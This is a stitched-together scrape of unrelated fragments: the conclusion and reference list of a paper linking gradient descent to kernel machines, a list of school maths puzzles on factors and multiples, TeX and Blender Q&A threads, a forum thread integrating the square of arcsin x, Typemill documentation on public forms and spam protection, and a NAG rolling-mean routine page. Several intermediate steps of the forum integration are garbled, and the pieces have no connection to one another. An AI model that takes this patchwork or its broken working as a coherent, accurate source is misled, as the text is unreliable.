Another consequence of our result is that every probabilistic model learned by gradient descent, including Bayesian networks (Koller and Friedman, 2009), is a form of kernel density estimation (Parzen, 1962). The result also implies that the solution of every convex learning problem is a kernel machine, irrespective of the optimization method used, since, being unique, it is necessarily the solution obtained by gradient descent. It is an open question whether the result can be extended to nonconvex models learned by non-gradient-based techniques, including constrained (Bertsekas, 1982) and combinatorial optimization (Papadimitriou and Steiglitz, 1982).
The results in this paper suggest a number of research directions. For example, viewing gradient descent as a method for learning path kernel machines may provide new paths for improving it. Conversely, gradient descent is not necessarily the only way to form superpositions of examples that are useful for prediction. The key question is how to optimize the tradeoff between accurately capturing the target function and minimizing the computational cost of storing and matching the examples in the superposition.
\acks
This research was partly funded by ONR grant N00014-18-1-2826. Thanks to Léon Bottou and Simon Du for feedback on a draft of this paper.
References
1. M. A. Aizerman, E. M. Braverman, and L. I. Rozonoer. Theoretical foundations of the potential function method in pattern recognition learning. Autom. & Remote Contr., 25:821–837, 1964.
2. Luigi Ambrosio, Nicola Gigli, and Giuseppe Savaré. Gradient Flows: In Metric Spaces and in the Space of Probability Measures. Birkhäuser, Basel, 2nd edition, 2008.
3. D. W. Arathorn. Map-Seeking Circuits in Visual Cognition: A Computational Mechanism for Biological and Machine Vision. Stanford Univ. Press, Stanford, CA, 2002.
4. Y. Bengio, O. Delalleau, and N. L. Roux. The curse of highly variable functions for local kernel machines. Adv. Neural Inf. Proc. Sys., 18:107–114, 2005.
5. Y. Bengio, A. Courville, and P. Vincent. Representation learning: A review and new perspectives. IEEE Trans. Patt. An. & Mach. Intell., 35:1798–1828, 2013.
6. P. Bertsekas. Constrained Optimization and Lagrange Multiplier Methods. Academic Press, Cambridge, MA, 1982.
7. S. Boyd and L. Vandenberghe. Convex Optimization. Cambridge University Press, Cambridge, UK, 2004.
8. W. Brendel and M. Bethge. Approximating CNNs with bag-of-local-features models works surprisingly well on ImageNet. In Proc. Int. Conf. Learn. Repr., 2019.
9. A. B. Carlson and P. B. Grilly. Communication Systems: An Introduction to Signals and Noise in Electrical Communication. McGraw-Hill, New York, 5th edition, 2009.
10. N. Cohen, O. Sharir, and A. Shashua. On the expressive power of deep learning: A tensor analysis. In Proc. Ann. Conf. Learn. Th., pages 698–728, 2016.
11. C. Cortes, M. Mohri, and A. Rostamizadeh. Learning non-linear combinations of kernels. Adv. Neural Inf. Proc. Sys., 22:396–404, 2009.
12. O. Delalleau and Y. Bengio. Shallow vs. deep sum-product networks. Adv. Neural Inf. Proc. Sys., 24:666–674, 2011.
13. J. Devlin, H. Cheng, H. Fang, S. Gupta, L. Deng, X. He, G. Zweig, and M. Mitchell. Language models for image captioning: The quirks and what works. In Proc. Ann. Meet. Assoc. Comp. Ling., pages 100–105, 2015.
14. G. Elidan, N. Lotner, N. Friedman, and D. Koller. Discovering hidden variables: A structure-based approach. Adv. Neural Inf. Proc. Sys., 13:479–485, 2000.
15. Y. Freund and R. Schapire. A decision-theoretic generalization of on-line learning and an application to boosting. J. Comp. & Sys. Sci., 55:119–139, 1997.
16. D. Gentner. Structure-mapping: A theoretical framework for analogy. Cog. Sci., 7:155–170, 1983.
17. I. Goodfellow, Y. Bengio, and A. Courville. Deep Learning. MIT Press, Cambridge, MA, 2016.
18. W. Hardle, M. Müller, and A. Werwatz. Nonparametric and Semiparametric Models. Springer, Berlin, 2004.
19. J. H. Holland. Adaptation in Natural and Artificial Systems. Univ. Michigan Press, Ann Arbor, MI, 1975.
20. A. Jacot, F. Gabriel, and C. Hongler. Neural tangent kernel: Convergence and generalization in neural networks. Adv. Neural Inf. Proc. Sys., 31:8571–8580, 2018.
21. D. Koller and N. Friedman. Probabilistic Graphical Models: Principles and Techniques. MIT Press, Cambridge, MA, 2009.
22. Y. LeCun, L. Bottou, Y. Bengio, and P. Haffner. Gradient-based learning applied to document recognition. Proc. IEEE, 86:2278–2324, 1998.
23. R. Lippmann, B. Gold, and M. Malpass. A comparison of Hamming and Hopfield neural networks for pattern classification. Technical Report 769, MIT Lincoln Lab, Lexington, MA, 1987.
24. L. Mason, J. Baxter, P. L. Bartlett, and M. R. Frean. Boosting algorithms as gradient descent. Adv. Neural Inf. Proc. Sys,, 12:512–518, 1999.
25. S. Muggleton and W. Buntine. Machine invention of first-order predicates by inverting resolution. In Proc. Int. Conf. Mach. Learn., pages 339–352, 1988.
26. M. A. Nielsen and I. L. Chuang. Quantum Computation and Quantum Information. Cambridge Univ. Press, Cambridge, UK, 2000.
27. C. Papadimitriou and K. Steiglitz. Combinatorial Optimization: Algorithms and Complexity. Prentice-Hall, Upper Saddle River, NJ, 1982.
28. E. Parzen. On estimation of a probability density function and mode. Ann. Math. Stat., 33:1065–1076, 1962.
29. T. Poggio and F. Girosi. Regularization algorithms for learning that are equivalent to multilayer networks. Science, 247:978–982, 1990.
30. R. Raina, A. Madhavan, and A. Y. Ng. Large-scale deep unsupervised learning using graphics processors. In Proc. Int. Conf. Mach. Learn., pages 873–880, 2009.
31. R. P. N. Rao and D. H. Ballard. Predictive coding in the visual cortex: A functional interpretation of some extra-classical receptive field effects. Nature Neurosci., 2:79–87, 1999.
32. M. T. Ribeiro, S. Singh, and C. Guestrin. “Why should I trust you?”: Explaining the predictions of any classifier. In Proc. Int. Conf. Knowl. Disc. & Data Mining, pages 1135–1144, 2016.
33. D. E. Rumelhart, G. E. Hinton, and R. J. Williams. Learning representations by back-propagating errors. Nature, 323:533–536, 1986.
34. B. Schölkopf and A. J. Smola. Learning with Kernels: Support Vector Machines, Regularization, Optimization, and Beyond. MIT Press, Cambridge, MA, 2002.
35. D. Scieur, V. Roulet, F. Bach, and A. d’Aspremont. Integration methods and optimization algorithms. Adv. Neural Inf. Proc. Sys., 30:1109–1118, 2017.
36. C. Szegedy, W. Zaremba, I. Sutskever, J. Bruna, D. Erhan, I. Goodfellow, and R. Fergus. Intriguing properties of neural networks. In Proc. Int. Conf. Learn. Repr., 2014.
37. A. Vaswani, N. Shazeer, N. Parmar, J. Uszkoreit, L. Jones, N. Aidan, L. Kaiser, and I. Polosukhin. Attention is all you need. Adv. Neural Inf. Proc. Sys., 30:5998–6008, 2017.
38. C. Zhang, S. Bengio, M. Hardt, B. Recht, and O. Vinyals. Understanding deep learning requires rethinking generalization. In Proc. Int. Conf. Learn. Repr., 2017.
39. Q. Zhang and S.-C. Zhu. Visual interpretability for deep learning: A survey. Front. Inf. Tech. & Elec. Eng., 19:27–39, 2018.
You are adding the first comment!
How to quickly get a good reply:
• Give credit where it’s due by listing out the positive aspects of a paper before getting into which changes should be made.
• Be specific in your critique, and provide supporting evidence with appropriate references to substantiate general statements.
• Your comment should inspire ideas to flow and help the author improves the paper.
The better we are at sharing our knowledge with each other, the faster we move forward.
The feedback must be of minimum 40 characters and the title a minimum of 5 characters
421948
How to quickly get a good answer:
• Keep your question short and to the point
• Check for grammar or spelling errors.
• Phrase it like a question
Test
Test description
|
|
Search by Topic
Resources tagged with Factors and multiples similar to Magic Caterpillars:
Filter by: Content type:
Stage:
Challenge level:
There are 92 results
Broad Topics > Numbers and the Number System > Factors and multiples
LCM Sudoku
Stage: 4 Challenge Level:
Here is a Sudoku with a difference! Use information about lowest common multiples to help you solve it.
LCM Sudoku II
Stage: 3, 4 and 5 Challenge Level:
You are given the Lowest Common Multiples of sets of digits. Find the digits and then solve the Sudoku.
Multiplication Equation Sudoku
Stage: 4 and 5 Challenge Level:
The puzzle can be solved by finding the values of the unknown digits (all indicated by asterisks) in the squares of the $9\times9$ grid.
Product Sudoku
Stage: 3, 4 and 5 Challenge Level:
The clues for this Sudoku are the product of the numbers in adjacent squares.
Transposition Cipher
Stage: 3 and 4 Challenge Level:
Can you work out what size grid you need to read our secret message?
Product Sudoku 2
Stage: 3 and 4 Challenge Level:
Given the products of diagonally opposite cells - can you complete this Sudoku?
Substitution Transposed
Stage: 3 and 4 Challenge Level:
Substitution and Transposition all in one! How fiendish can these codes get?
Substitution Cipher
Stage: 3 and 4 Challenge Level:
Find the frequency distribution for ordinary English, and use it to help you crack the code.
Remainder
Stage: 3 Challenge Level:
What is the remainder when 2^2002 is divided by 7? What happens with different powers of 2?
14 Divisors
Stage: 3 Challenge Level:
What is the smallest number with exactly 14 divisors?
Cuboids
Stage: 3 Challenge Level:
Find a cuboid (with edges of integer values) that has a surface area of exactly 100 square units. Is there more than one? Can you find them all?
The Remainders Game
Stage: 2 and 3 Challenge Level:
A game that tests your understanding of remainders.
X Marks the Spot
Stage: 3 Challenge Level:
When the number x 1 x x x is multiplied by 417 this gives the answer 9 x x x 0 5 7. Find the missing digits, each of which is represented by an "x" .
GOT IT Now
Stage: 2 and 3 Challenge Level:
For this challenge, you'll need to play Got It! Can you explain the strategy for winning this game with any target?
Factorial
Stage: 4 Challenge Level:
How many zeros are there at the end of the number which is the product of first hundred positive integers?
AB Search
Stage: 3 Challenge Level:
The five digit number A679B, in base ten, is divisible by 72. What are the values of A and B?
A First Product Sudoku
Stage: 3 Challenge Level:
Given the products of adjacent cells, can you complete this Sudoku?
Data Chunks
Stage: 4 Challenge Level:
Data is sent in chunks of two different sizes - a yellow chunk has 5 characters and a blue chunk has 9 characters. A data slot of size 31 cannot be exactly filled with a combination of yellow and. . . .
Stage: 3 Challenge Level:
A mathematician goes into a supermarket and buys four items. Using a calculator she multiplies the cost instead of adding them. How can her answer be the same as the total at the till?
Squaresearch
Stage: 4 Challenge Level:
Consider numbers of the form un = 1! + 2! + 3! +...+n!. How many such numbers are perfect squares?
Factors and Multiples Game
Stage: 2, 3 and 4 Challenge Level:
A game in which players take it in turns to choose a number. Can you block your opponent?
Shifting Times Tables
Stage: 3 Challenge Level:
Can you find a way to identify times tables after they have been shifted up?
Stage: 3 Challenge Level:
Make a set of numbers that use all the digits from 1 to 9, once and once only. Add them up. The result is divisible by 9. Add each of the digits in the new number. What is their sum? Now try some. . . .
Remainders
Stage: 3 Challenge Level:
I'm thinking of a number. When my number is divided by 5 the remainder is 4. When my number is divided by 3 the remainder is 2. Can you find my number?
Reverse to Order
Stage: 3 Challenge Level:
Take any two digit number, for example 58. What do you have to do to reverse the order of the digits? Can you find a rule for reversing the order of digits for any two digit number?
Different by One
Stage: 4 Challenge Level:
Make a line of green and a line of yellow rods so that the lines differ in length by one (a white rod)
Three Times Seven
Stage: 3 Challenge Level:
A three digit number abc is always divisible by 7 when 2a+3b+c is divisible by 7. Why?
What a Joke
Stage: 4 Challenge Level:
Each letter represents a different positive digit AHHAAH / JOKE = HA What are the values of each of the letters?
Factoring Factorials
Stage: 3 Challenge Level:
Find the highest power of 11 that will divide into 1000! exactly.
N000ughty Thoughts
Stage: 4 Challenge Level:
Factorial one hundred (written 100!) has 24 noughts when written in full and that 1000! has 249 noughts? Convince yourself that the above is true. Perhaps your methodology will help you find the. . . .
Ben's Game
Stage: 3 Challenge Level:
Ben passed a third of his counters to Jack, Jack passed a quarter of his counters to Emma and Emma passed a fifth of her counters to Ben. After this they all had the same number of counters.
Inclusion Exclusion
Stage: 3 Challenge Level:
How many integers between 1 and 1200 are NOT multiples of any of the numbers 2, 3 or 5?
Thirty Six Exactly
Stage: 3 Challenge Level:
The number 12 = 2^2 × 3 has 6 factors. What is the smallest natural number with exactly 36 factors?
Hot Pursuit
Stage: 3 Challenge Level:
The sum of the first 'n' natural numbers is a 3 digit number in which all the digits are the same. How many numbers have been summed?
American Billions
Stage: 3 Challenge Level:
Play the divisibility game to create numbers in which the first two digits make a number divisible by 2, the first three digits make a number divisible by 3...
Even So
Stage: 3 Challenge Level:
Find some triples of whole numbers a, b and c such that a^2 + b^2 + c^2 is a multiple of 4. Is it necessarily the case that a, b and c must all be even? If so, can you explain why?
Eminit
Stage: 3 Challenge Level:
The number 8888...88M9999...99 is divisible by 7 and it starts with the digit 8 repeated 50 times and ends with the digit 9 repeated 50 times. What is the value of the digit M?
Oh! Hidden Inside?
Stage: 3 Challenge Level:
Find the number which has 8 divisors, such that the product of the divisors is 331776.
Phew I'm Factored
Stage: 4 Challenge Level:
Explore the factors of the numbers which are written as 10101 in different number bases. Prove that the numbers 10201, 11011 and 10101 are composite in any base.
How Old Are the Children?
Stage: 3 Challenge Level:
A student in a maths class was trying to get some information from her teacher. She was given some clues and then the teacher ended by saying, "Well, how old are they?"
Two Much
Stage: 3 Challenge Level:
Explain why the arithmetic sequence 1, 14, 27, 40, ... contains many terms of the form 222...2 where only the digit 2 appears.
Factor Track
Stage: 2 and 3 Challenge Level:
Factor track is not a race but a game of skill. The idea is to go round the track in as few moves as possible, keeping to the rules.
Stage: 3 Challenge Level:
List any 3 numbers. It is always possible to find a subset of adjacent numbers that add up to a multiple of 3. Can you explain why and prove it?
Helen's Conjecture
Stage: 3 Challenge Level:
Helen made the conjecture that "every multiple of six has more factors than the two numbers either side of it". Is this conjecture true?
Special Sums and Products
Stage: 3 Challenge Level:
Find some examples of pairs of numbers such that their sum is a factor of their product. eg. 4 + 12 = 16 and 4 × 12 = 48 and 16 is a factor of 48.
Gaxinta
Stage: 3 Challenge Level:
A number N is divisible by 10, 90, 98 and 882 but it is NOT divisible by 50 or 270 or 686 or 1764. It is also known that N is a factor of 9261000. What is N?
Expenses
Stage: 4 Challenge Level:
What is the largest number which, when divided into 1905, 2587, 3951, 7020 and 8725 in turn, leaves the same remainder each time?
Dozens
Stage: 3 Challenge Level:
Do you know a quick way to check if a number is a multiple of two? How about three, four or six?
Diggits
Stage: 3 Challenge Level:
Can you find what the last two digits of the number $4^{1999}$ are?
|
|
# How to use wraptable with llncs format?
I have to use llncs format: example here.
I'm trying to wrap a simple table. Here's my syntax:
this is some sample text, blah blah blah
\begin{wraptable}%{r}{0.35\textwidth}
\begin{tabular}{cc}
\multicolumn{2}{c}{\textbf{table title here}}\\
\toprule
\textbf{A} & b\\
\textbf{C} & d \\
\textbf{E} & f\\
\bottomrule
\label{tab}
\end{tabular}
\end{wraptable}
more text here blah blah lhabladfl blha blha blah
but this only wraps one line around the table:
I'm using llncs format which breaks if I use \usepackage{wrapfig}, so currently I'm not importing that package.
Also, if I use begin{wraptable}{r}{0.35\textwidth}, then the r0.35extwidth appears as text in the paper just before the table!
Anyone know how to fix this problem?
• llncs is compatible with wrapfig, see my answer below. If you still experience problems, please post a complete document, starting with \documentclass and ending with \end{document}. Something may be wrong, but it is not the combination llncs+wrapfig. – gernot Mar 18 '17 at 10:22
llncs doesn't appear to define an environment called wraptable, did you not get an error? The image you show is consistent with just putting a tabular (acting as an oversized letter in the middle of a paragraph, the text isn't wrapping at all, the table is just in the main paragraph flow.
Never ignore TeX errors, the pdf produced after an error is at best useful as a debugging aid, TeX's error recovery is not intended to produce usable output.
• The example link I was following added many packages as had I. Not sure which packages were causing problems, but i started from scratch adding only the packages i needed and it worked w/o errors. I did have to add \usepackage{wrapfig}. – travelingbones Mar 19 '17 at 14:36
I don't see why the llncs format breaks when using wrapfig.
\documentclass{llncs}
\usepackage{wrapfig,booktabs}
\usepackage{lipsum}
\begin{document}
\begin{wraptable}{r}{0.35\textwidth}
\begin{tabular}{cc}
\multicolumn{2}{c}{\textbf{table title here}}\\
\toprule
\textbf{A} & b\\
\textbf{C} & d\\
\textbf{E} & f\\
\bottomrule
\end{tabular}
\end{wraptable}
\lipsum[1]
\end{document}
|
|
# How to get edges and normal map from 3D model?
I want to extract edges and normal maps from the 3d model using freestyle. However, my rendered normal map looks like this
But it should look like this.
there are two problems, there's no blue channel in the rendered normal map. And there is a shaded area which is black even lamp exists there.
I think I should render matcap in shading properties, but I have no idea how to render like matcap.
• The thing you want is called world normal map (global normal map), and depends on how the normal vector is stored in map, the color can be black in certain case. You should specify your question a little bit more on what you want. – Hikariztw May 15 '19 at 5:01
Normal maps in Blender store a normal as follows:
• Red maps from (0 - 255) to X (-1.0 - 1.0)
• Green maps from (0 - 255) to Y (-1.0 - 1.0)
• Blue maps from (0 - 255) to Z (0.0 - 1.0)
Since normals all point towards a viewer, negative Z values are not stored (they would be invisible anyway). In Blender we store a full blue range, although some other implementations also map blue colors (128 - 255) to (0.0 - 1.0). The latter convention is used in “Doom 3” for example.
If you want to achieve the default Blender normal map definition (z start from 0.0 instead of -1.0). You need to defined what will happen if -1 < z < 0
Below is two examples for how to calculate it by node editor:
Is the first one you are asking for?
|
|
# Quantisation commutes with reduction at discrete series representations of semisimple groups
@article{Hochs2007QuantisationCW,
title={Quantisation commutes with reduction at discrete series representations of semisimple groups},
author={P. Hochs},
}
|
|
# Math Help - ∫(sin⁻¹x)²
1. ## ∫(sin⁻¹x)²
$∫(sin⁻¹x)²$
the only problem is i have to do it via method of substitution, i dont have to to use integration by parts
2. Let use integration by parts.
Let $u = [ arcsin(x) ]^2; dv = dx;
du = 2arcsin(x) (\frac{1}{\sqrt(1 - x^2)}) dx; v = x.$
Which gives us:
$x [arcsin(x)]^2 - \int ( 2x arcsin(x) (\frac{1}{\sqrt(1 - x^2)}) )
$
Using integration by parts again.
Let $u = arcsin(x); dv = \frac{2x}{\sqrt(1 - x^2)} dx.
du = \frac{1}{\sqrt(1 - x^2)} dx; v = (-1)\sqrt(1 - x^2)
$
$x [arcsin(x)]^2 - [ (-1) arcsin(x) \sqrt(1 - x^2) - \int ( [\frac{1}{\sqrt(1 - x^2)}] [(-1)\sqrt{(1 - x^2)^(1/2)}] du )$
$x [arcsin(x)]^2 + arcsin(x) \sqrt{(1 - x^2)} + \int ( [\frac{1}{\sqrt{(1 - x^2)}}] [(-1)\sqrt{(1 - x^2)^(1/2)}] du )$
$
x [arcsin(x)]^2 + arcsin(x) \sqrt{(1 - x^2)} - \int ( [\frac{1}{\sqrt{(1 - x^2)}}] [\sqrt{(1 - x^2)}] du )$
$x [arcsin(x)]^2 + arcsin(x) \sqrt{(1 - x^2)} - \int dx$
So,
$x [arcsin(x)]^2 + arcsin(x) \sqrt{(1 - x^2)} - x + C$
3. By substitution:
let $t=arcsinx$
so, $sint=x$
$dt=\frac{dx}{\sqrt{1-x^2}$
$dx=\sqrt{1-sin^2t}dt=costdt$
$\int (arcsinx)^2dx=\int t^2costdt$
I let you finishing this (by parts)
I guess there is no escape from integration by parts...
4. ## ...
By substitution:
let $t=arcsinx$
so, $sint=x$
$dt=\frac{dx}{\sqrt{1-x^2}}$
$dx=\sqrt{1-sin^2t}dt=costdt$
$\int (arcsinx)^2dx=\int t^2costdt$
I let you finishing this (by parts)
I guess there is no escape from integration by parts...
5. i guess the same, i hope the question is misprinted in the substitution exercise,
thanks everyone for their time.
|
|
# Public Forms
edit
Public forms, like contact or newsletter subscription forms, are a common requirement for websites, but often a hassle for developers. Typemill makes your life much easier, because all you need is a plugin with some form definitions in YAML, and business logic in PHP. All the complicated stuff like generating the front end forms, validating, form-data, and adding spam security or CSRF-protection is done by Typemill automatically.
## #Form Definitions
Public forms are defined in a separate block of the YAML-configuration-file of your plugin. Public forms can use the exact same field definitions as theme- and plugin-forms. Look at this example:
forms:
fields:
myfield:
type: text
label: 'I am a textfield'
required: true
public:
fields:
mypublicfield:
type: text
label: 'I am a textfield'
required: true
You probably want to customize the labels and text hints of your public forms, so that the admin can localize them for example. This can be done by a simple reference like this:
forms:
fields:
mail_label:
type: text
label: 'Label of Mail-Input-Field'
placeholder: 'Localize label here'
required: true
public:
fields:
mail:
type: text
label: mail_label
required: true
The label of the public mail field has a reference to the mail_label field of the admin forms. This way, the admin can overwrite the label for the mail-field of the public form in the plugin-settings. You can add references like this for three fieldtypes:
• label
• help
• description
Typemill has a pretty straight-forward approach to logic for public forms: If a user sends data with a public form, then Typemill will check the data and redirect the user back to the original page. If the data is valid, then Typemill will store the data before it redirects the user. If the data is not valid, and contains errors, then Typemill will add error messages before it redirects the user.
In your plugin, you can handle both the frontend form AND the incoming form data with two handy methods. Both methods expect the name of the plugin as a variable:
• $this->getFormdata('pluginName'): Checks and returns input data from a form. • $this->generateForm('pluginName'): Generates the frontend-form.
If the user has submitted a form and if the form data is valid, then the method $this->getFormdata will return the data, and you can process the data. You always have to check for existing form data first. If no form data exists, then you can generate the frontend form and display it to the user. So your code will always look similar to this: # check if form data have been stored$formdata = $this->getFormdata('contactform'); if($formdata)
{
# process the formdata here, e.g. store them or send a mail
}
else
{
# get the public forms for the plugin
$contactform =$this->generateForm('contactform');
}
## #Spam Security
Spam is really annoying, so Typemill tries to exclude spam-bots from public forms. If a spam-bot is detected, then the method $this->formdata('myplugin') returns the keyword bot, so you should always add an extra if-else statement for this: $formdata = $this->getFormdata('contactform'); if($formdata)
{
if(\$formdata == 'bot')
{
# add a message for the frontend here
}
else
{
# process the form-data
}
}
...
By default, Typemill adds a simple honeypot test to each form. Typemill also adds an option to activate google recaptcha for each form, so the user can decide in the settings of your plugin if he wants to use Recaptcha protection or not. You don't have to worry about that.
## #Security and Validation
On top of the spam protection, Typemill adds a CSFR-check to each form. Additionally, Typemill will validate all incoming data against the original form definition, so no additional data can be posted. Incoming data is validated with common rules; no HTML or other code characters will pass the validation. All error messages are added automatically, so you do not have to worry about it. It is strongly recommended that you use HTTPS connections for all public forms.
|
|
G01 Chapter Contents
G01 Chapter Introduction
NAG Library Manual
# NAG Library Routine DocumentG01WAF
Note: before using this routine, please read the Users' Note for your implementation to check the interpretation of bold italicised terms and other implementation-dependent details.
## 1 Purpose
G01WAF calculates the mean and, optionally, the standard deviation using a rolling window for an arbitrary-sized data stream.
## 2 Specification
SUBROUTINE G01WAF ( M, NB, X, IWT, WT, PN, RMEAN, RSD, LRSD, RCOMM, LRCOMM, IFAIL)
INTEGER M, NB, IWT, PN, LRSD, LRCOMM, IFAIL REAL (KIND=nag_wp) X(NB), WT(*), RMEAN(max(0,NB+min(0,PN-M+1))), RSD(LRSD), RCOMM(LRCOMM)
## 3 Description
Given a sample of $n$ observations, denoted by $x=\left\{{x}_{i}:i=1,2,\dots ,n\right\}$ and a set of weights, $w=\left\{{w}_{j}:j=1,2,\dots ,m\right\}$, G01WAF calculates the mean and, optionally, the standard deviation, in a rolling window of length $m$.
The mean is defined as
$μi = ∑ j=1 m wj xi+j-1 W$ (1)
and the standard deviation as
$σi = ∑ j=1 m wj xi+j-1 - μi 2 W - ∑ j=1 m wj2 W$ (2)
with $W=\sum _{j=1}^{m}{w}_{j}$.
Four different types of weighting are possible:
(i) No weights (${w}_{j}=1$)
When no weights are required both the mean and standard deviations can be calculated in an iterative manner, with
$μi+1= μi + xi+m - xi m σi+1= σi + xi+m - μi 2 - xi - μi 2 - xi+m - xi 2 m$
where the initial values ${\mu }_{1}$ and ${\sigma }_{1}$ are obtained using the one pass algorithm of West (1979).
(ii) Each observation has its own weight
In this case, rather than supplying a vector of $m$ weights a vector of $n$ weights is supplied instead, $v=\left\{{v}_{j}:j=1,2,\dots ,n\right\}$ and ${w}_{j}={v}_{i+j-1}$ in (1) and (2).
If the standard deviations are not required then the mean is calculated using the iterative formula:
$Wi+1= Wi+ vi+m - vi μi+1= Wi μi + vi+m xi+m - vi xi$
where ${W}_{1}=\sum _{i=1}^{m}{v}_{i}$ and ${\mu }_{1}={W}_{1}^{-1}\sum _{i=1}^{m}{v}_{i}{x}_{i}$.
If both the mean and standard deviation are required then the one pass algorithm of West is applied multiple times.
(iii) Each position in the window has its own weight
This is the case as described in (1) and (2), where the weight given to each observation differs depending on which summary is being produced. When these types of weights are specified both the mean and standard deviation are calculated by applying the one pass algorithm of West multiple times.
(iv) Each position in the window has a weight equal to its position number (${w}_{j}=j$)
This is a special case of (iii).
If the standard deviations are not required then the mean is calculated using the iterative formula:
$Si+1= Si+ xi+m - xi μi+1= μi + 2 m xi+m - Si m m+1$
where ${S}_{1}=\sum _{i=1}^{m}{x}_{i}$ and ${\mu }_{1}=2{\left({m}^{2}+m\right)}^{-1}{S}_{1}$.
If both the mean and standard deviation are required then the one pass algorithm of West is applied multiple times.
For large datasets, or where all the data is not available at the same time, $x$ (and if each observation has its own weight, $v$) can be split into arbitrary sized blocks and G01WAF called multiple times.
## 4 References
West D H D (1979) Updating mean and variance estimates: An improved method Comm. ACM 22 532–555
## 5 Parameters
1: M – INTEGERInput
On entry: $m$, the length of the rolling window.
If ${\mathbf{PN}}\ne 0$, M must be unchanged since the last call to G01WAF.
Constraint: ${\mathbf{M}}\ge 1$.
2: NB – INTEGERInput
On entry: $b$, the number of observations in the current block of data. The size of the block of data supplied in X (and when ${\mathbf{IWT}}=1$, WT) can vary; therefore NB can change between calls to G01WAF.
Constraints:
• ${\mathbf{NB}}\ge 0$;
• if ${\mathbf{LRCOMM}}=0$, ${\mathbf{NB}}\ge {\mathbf{M}}$.
3: X(NB) – REAL (KIND=nag_wp) arrayInput
On entry: the current block of observations, corresponding to ${x}_{\mathit{i}}$, for $\mathit{i}=k+1,\dots ,k+b$, where $k$ is the number of observations processed so far and $b$ is the size of the current block of data.
4: IWT – INTEGERInput
On entry: the type of weighting to use.
${\mathbf{IWT}}=0$
No weights are used.
${\mathbf{IWT}}=1$
Each observation has its own weight.
${\mathbf{IWT}}=2$
Each position in the window has its own weight.
${\mathbf{IWT}}=3$
Each position in the window has a weight equal to its position number.
If ${\mathbf{PN}}\ne 0$, IWT must be unchanged since the last call to G01WAF.
Constraint: ${\mathbf{IWT}}=0$, $1$, $2$ or $3$.
5: WT($*$) – REAL (KIND=nag_wp) arrayInput
Note: the dimension of the array WT must be at least ${\mathbf{NB}}$ if ${\mathbf{IWT}}=1$ and at least ${\mathbf{M}}$ if ${\mathbf{IWT}}=2$.
On entry: the user-supplied weights.
If ${\mathbf{IWT}}=1$, ${\mathbf{WT}}\left(\mathit{i}\right)={v}_{i}$, for $\mathit{i}=1,2,\dots ,n$.
If ${\mathbf{IWT}}=2$, ${\mathbf{WT}}\left(\mathit{j}\right)={w}_{j}$, for $\mathit{j}=1,2,\dots ,m$.
Otherwise, WT is not referenced.
Constraints:
• if ${\mathbf{IWT}}=1$, ${\mathbf{WT}}\left(\mathit{i}\right)\ge 0$, for $\mathit{i}=1,2,\dots ,{\mathbf{NB}}$;
• if ${\mathbf{IWT}}=2$, ${\mathbf{WT}}\left(1\right)\ne 0$ and ${\sum }_{i=1}^{m}{\mathbf{WT}}\left(i\right)>0$;
• if ${\mathbf{IWT}}=2$ and ${\mathbf{LRSD}}\ne 0$, ${\mathbf{WT}}\left(\mathit{i}\right)\ge 0$, for $\mathit{i}=1,2,\dots ,{\mathbf{M}}$.
6: PN – INTEGERInput/Output
On entry: $k$, the number of observations processed so far. On the first call to G01WAF, or when starting to summarise a new dataset, PN must be set to $0$.
If ${\mathbf{PN}}\ne 0$, it must be the same value as returned by the last call to G01WAF.
On exit: $k+b$, the updated number of observations processed so far.
Constraint: ${\mathbf{PN}}\ge 0$.
7: RMEAN($\mathrm{max}\phantom{\rule{0.125em}{0ex}}\left(0,{\mathbf{NB}}+\mathrm{min}\phantom{\rule{0.125em}{0ex}}\left(0,{\mathbf{PN}}-{\mathbf{M}}+1\right)\right)$) – REAL (KIND=nag_wp) arrayOutput
On exit: ${\mu }_{\mathit{l}}$, the (weighted) moving averages, for $\mathit{l}=1,2,\dots ,b+\mathrm{min}\phantom{\rule{0.125em}{0ex}}\left(0,k-m+1\right)$. Where ${\mu }_{l}$ is the summary to the window that ends on ${\mathbf{X}}\left(l+m-\mathrm{min}\phantom{\rule{0.125em}{0ex}}\left(k,m-1\right)-1\right)$. Therefore, if, on entry, ${\mathbf{PN}}\ge {\mathbf{M}}-1$, ${\mathbf{RMEAN}}\left(l\right)$ is the summary corresponding to the window that ends on ${\mathbf{X}}\left(l\right)$ and if, on entry, ${\mathbf{PN}}=0$, ${\mathbf{RMEAN}}\left(l\right)$ is the summary corresponding to the window that ends on ${\mathbf{X}}\left({\mathbf{M}}+l-1\right)$ (or, equivalently, starts on ${\mathbf{X}}\left(l\right)$).
8: RSD(LRSD) – REAL (KIND=nag_wp) arrayOutput
On exit: if ${\mathbf{LRSD}}\ne 0$ then ${\sigma }_{l}$, the (weighted) standard deviation. The ordering of RSD is the same as the ordering of RMEAN.
If ${\mathbf{LRSD}}=0$, RSD is not referenced.
9: LRSD – INTEGERInput
On entry: the dimension of the array RSD as declared in the (sub)program from which G01WAF is called. If the standard deviations are not required then LRSD should be set to zero.
Constraint: ${\mathbf{LRSD}}=0$ or ${\mathbf{LRSD}}\ge \mathrm{max}\phantom{\rule{0.125em}{0ex}}\left(0,{\mathbf{NB}}+\mathrm{min}\phantom{\rule{0.125em}{0ex}}\left(0,{\mathbf{PN}}-{\mathbf{M}}+1\right)\right)$.
10: RCOMM(LRCOMM) – REAL (KIND=nag_wp) arrayCommunication Array
On entry: communication array, used to store information between calls to G01WAF. If ${\mathbf{LRCOMM}}=0$, RCOMM is not referenced and all the data must be supplied in one go.
11: LRCOMM – INTEGERInput
On entry: the dimension of the array RCOMM as declared in the (sub)program from which G01WAF is called.
Constraint: ${\mathbf{LRCOMM}}=0$ or ${\mathbf{LRCOMM}}\ge 2{\mathbf{M}}+20$.
12: IFAIL – INTEGERInput/Output
On entry: IFAIL must be set to $0$, $-1\text{ or }1$. If you are unfamiliar with this parameter you should refer to Section 3.3 in the Essential Introduction for details.
For environments where it might be inappropriate to halt program execution when an error is detected, the value $-1\text{ or }1$ is recommended. If the output of error messages is undesirable, then the value $1$ is recommended. Otherwise, if you are not familiar with this parameter, the recommended value is $0$. When the value $-\mathbf{1}\text{ or }\mathbf{1}$ is used it is essential to test the value of IFAIL on exit.
On exit: ${\mathbf{IFAIL}}={\mathbf{0}}$ unless the routine detects an error or a warning has been flagged (see Section 6).
## 6 Error Indicators and Warnings
If on entry ${\mathbf{IFAIL}}={\mathbf{0}}$ or $-{\mathbf{1}}$, explanatory error messages are output on the current error message unit (as defined by X04AAF).
Errors or warnings detected by the routine:
${\mathbf{IFAIL}}=11$
On entry, ${\mathbf{M}}=⟨\mathit{\text{value}}⟩$.
